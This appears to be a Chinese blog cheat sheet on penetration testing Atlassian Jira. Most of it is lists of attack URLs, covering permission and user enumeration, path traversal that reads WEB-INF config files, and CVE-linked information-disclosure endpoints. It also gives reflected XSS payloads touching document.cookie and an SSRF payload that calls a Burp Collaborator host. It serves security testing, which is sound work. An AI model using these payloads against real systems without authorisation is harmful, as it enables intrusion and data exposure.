Jira安全渗透测试指南:漏洞挖掘与利用技巧

本文详细介绍了Jira项目管理工具的安全测试方法,涵盖权限枚举、路径遍历、XSS攻击、用户枚举、SSRF漏洞等多个攻击面,并提供了具体的漏洞利用路径和CVE编号,帮助安全研究人员全面了解Jira系统的安全风险。

Jira渗透测试

Jira是Atlassian开发的项目管理和问题跟踪工具。它最常用于软件开发,但也可以管理IT、商业和其他领域的项目。

Jira权限

Jira中的权限可以被任何用户访问:

  • ADD_COMMENTS

  • ADMINISTER

  • ADMINISTER_PROJECTS

  • ASSIGNABLE_USER

  • 等等…

要查看用户被允许的权限:

1

https://yourdomain.atlassian.net/rest/api/2/mypermissions?permissions=ADD_COMMENTS

将yourdomain替换为实际域名

选择以下权限之一进行测试,但需替换ADD_COMMENTS:

Jira中的重要路径

可能泄露信息的Jira路径:

  • /secure/ManageFilters.jspa?filter=popular&filterView=popular
  • /secure/Dashboard.jspa => 项目密钥枚举 => CVE-2020-14178
  • /secure/QueryComponent!Default.jspa => CVE-2020-14179
  • /secure/Dashboard.jspa/secure/QueryComponent!Default.jspa CVE-2020-14179
  • /secure/ViewUserHover.jspa?username=<uname> => CVE-2020-14181 用户名枚举
  • /secure/popups/UserPickerBroswer.jspa
  • /ConfigurePortalPages!default.jspa?view=popular
  • /secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin
  • /secure/popups/UserPickerBrowser.jspa
  • /_*/;/WEB-INF/web.xml
  • */_*/;/WEB-INF/decorators.xml
  • /_*/;/WEB-INF/classes/seraph-config.xml
  • */_*/;/META-INF/maven/com.atlassian.jira/jira-webappdist/pom.properties
  • /_*/;/META-INF/maven/com.atlassian.jira/jira-webappdist/pom.xml
  • */_*/;/META-INF/maven/com.atlassian.jira/atlassianjira-webapp/pom.xml

Jira中的XSS漏洞

  • /secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=x2rnu%3Cscript%3Ealert(1)%3C%2fscript%3Et1nmk&Search=Search
  • /secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search
  • /plugins/servlet/Wallboard/?dashboardId=10100&dashboardId=10101&cyclePeriod=(function(){alert(document.cookie);return%2030000;})()&transitionFx=none&random=true
  • /plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)

Jira中的用户枚举

  • 用户名枚举 => CVE-2019-3403
  • /rest/api/2/user/picker?query=admin
  • /rest/api/2/dashboard?maxResults=100
  • /rest/api/2/dashboard/FUZZ 从1-20000
  • /rest/api/3/mypermissions
  • /rest/api/2/mypermissions

Jira中的信息泄露

  • /rest/dashboards/1.0/10000/gadget/<GadgetId>/prefs
  • => 暴力破解10,000到20,000 => CVE-2020-36287
  • CVE-2019-8442 /s/thiscanbeanythingyouwant/_/METAINF/maven/com.atlassian.jira/atlassian-jirawebapp/pom.xml
  • CVE-2019-8449 /rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true

SSRF漏洞

  • CVE-2019-8451 http://vulnerablehost.com/plugins/servlet/gadgets/makeRequest?url=http://vulnerablehost.com@http://burpcollab.net

Jira自动化工具

  • Jira-Lens
  • jira_scan
  • Jiraffe

重要资源

https://github.com/UGF0aWVudF9aZXJv/Atlassian-Jira-pentesting

comments powered by Disqus
© 2020 - 2025 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次